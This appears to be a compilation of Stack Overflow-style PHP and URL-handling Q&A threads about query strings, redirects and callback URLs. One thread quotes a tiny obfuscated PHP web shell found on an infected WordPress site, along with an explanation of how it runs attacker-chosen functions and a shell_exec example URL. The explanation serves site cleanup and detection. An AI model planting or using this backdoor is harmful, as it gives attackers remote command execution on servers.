I want twitter to send a user back to
site.com/person.php?person=$curr_person
where $curr_person is a session variable stored in $_SESSION['person'] and obtained from $_GET['person']
Problem is when Twitter redirects back to my site $curr_person is not evaluated and is taken literally. I assume the redirect doesn't hit my server...how can I get the call back URL to be evaluated properly?
Thanks
The reason it is not evaluated is probably because you entered it as a part of the string like that:
$twitter->call('site.com/person.php?person=$curr_person');
But there are two solutions:
Concatenate:
$twitter->call('site.com/person.php?person=' . $curr_person);
Use double quotes:
$twitter->call("site.com/person.php?person=$curr_person");
Hope this helps.
Ps. Of course I am assuming you are passing this URL to some method (like $twitter->call()), so do not just copy the code - just get familiar with the way both solutions differ from the code at the beginning of my answer.
Related
So just a quick thought and I understand that there are millions of ways around this 'problem' but I was wondering if there is a character or format for both initiating and separating GET parameters. Let me explain:
I am redirecting the user to a link defined as a variable but adding on a parameter at the end like so:
Header("Location: ".$link."&err=1");
The problem is, some of these links ($link) will contain GET params and some will not. If the link does not already contain GET parameters, '&' will not work as an initiator.
Header("Location: page&err=1");
And if the link does already contain parameters, '?' will not work as a separating character.
Header("Location: page?val=123?err=1");
So again, I know there are many ways around this and I'm not lookign for someone to code a simple check for me but I'm curious about the link formatting aspect and I can't find anything through my own research. I'm honestly expecting that the answer is 'not possible' but I'm intrigued enough to ask now, thanks.
No.
? starts the query string.
& and ; separate key=value pairs in application/x-www-form-urlencoded data which is the format most back ends expect. (; hasn't got as good a level of support).
Will parse_url() not work?
Specifically parse_url($url, PHP_URL_QUERY);
http_build_query() could also be useful
I extracted this from a wordpress-site, that happened to be infected and gets cleaned up by me.
<?php ($_=#$_GET[page]).#$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
Let's break this up a little bit:
($_=#$_GET[page]) . #$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the # would be suppressing any errors from it.
The second expression, # $_( $_POST[404] ); is starting off with error suppression # of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
I have a page that does a re-direct as such, following the guidelines from this SO Post.
header("Location: http://www.fivefoo.com?uid=johnny");
die();
This small php file is located here in index.php of course.
http://www.fivefoo.com/johnny
What I did was just add on a query to the re-direct
?uid=johnny.
First and main question. Am I allowed to to do this?
Secondly, where do I retrieve the query values. My guess, would be the $_GET global.
Yes you are allowed to do this (why shouldn't you be?)
Yes, you can get the query values from the $_GET superglobal array. More specifically, $_GET['uid'] will contain the text 'johnny' (without the quotes of course).
Yes, you can do this.
Yes, the $_GET is used for this, so $_GET['uid'] in your example would return 'johnny'.
More info here
i belive it is quite simple question.
I am making an ajax call with jquery and all that i want is to set custom hash after the call similar to this:
window.location.hash = '?url=http://www.sitename.com';
but it returns # symbol before that and i dont want it
www.mysitename.com/#?url=http://www.sitename.com
so basically how to remove that # symbol and attach a clean hash without it?
Thank you.
You cannot. If you want to set a query string (the ?something=something stuff) you have to set it (and by doing so cause a page reload) by changing location.search (only the query string) or location.href - nothing AJAXish/Web2.0ish ;)
The hash is the client-side part after the # sign and never sent to the server. It's purely meant to target page elements (for example a <h2 id="something"> is targeted by the hash #something) and nowadays to keep state information in the URL so the back/forward buttons keep working in AJAX applications (even though that'll eventually be replaced with HTML5's pushState function).
If you still want to use the hash, please do so in a google-compatible way. Basically it means you should use #!something in the hash where something could also be part of the real URL in a classical (non-AJAX) request.
The hash in a URL is, per the MDC docs:
the part of the URL that follows the # symbol, including the # symbol.
Note that the # character (which I believe is called the "pound sign" in North America) is generally called the "hash".
You want to set window.location.search instead. This is:
the part of the URL that follows the ? symbol, including the ? symbol.
Note that this triggers a reload. If you don't want this, you need to use the hash property.
I use a query string, for example test.php?var=1.
How can I check if a user types anything after that, like another string...
I try to redirect to index.php if any other string (query string) follows my var query string.
Is it possible to check this?
For example:
test.php?var=12134 (This is a good link..)
test.php?a=23&var=123 (this is a bad link, redirect to index..)
test.php?var=123132&a=23 (this is a bad link, redirect to index..)
I'm not sure I fully understand what you want, but if you're not interested in the positioning of the parameters this should work:
if ( isset($_GET['var']) && count($_GET) > 1 ) {
//do something if var and another parameter is given
}
Look in $_SERVER['QUERY_STRING'].
Similar to Tom Haigh’s answer, you could also get the difference of the arguments you expect and those you actually get:
$argKeys = array_keys($_GET);
$additionalArgKeys = array_diff($argKeys, array('var'));
var_dump($additionalArgKeys);
test.php?a=23?var=123 (this is a bad link, redirect to index..)
In this case, you only have one variable sent, named "a" containing the value "a?var=123", therefore it shouldn't be a problem for you.
test.php?var=123132&a=23 (this is a bad link, redirect to index..)
In this case you have two variables sent, ("a" and "var").
In general you can check the $_GET array to see how many variables have been sent and act accordingly, by using count($_GET).
I think you are trying to get rid of unwanted parameters. This is usually done for security reasons.
There won't be a problem, however, if you preinitalize every variable you use and only use variables with $_GET['var'], $_POST['var'] or $_REQUEST['var'].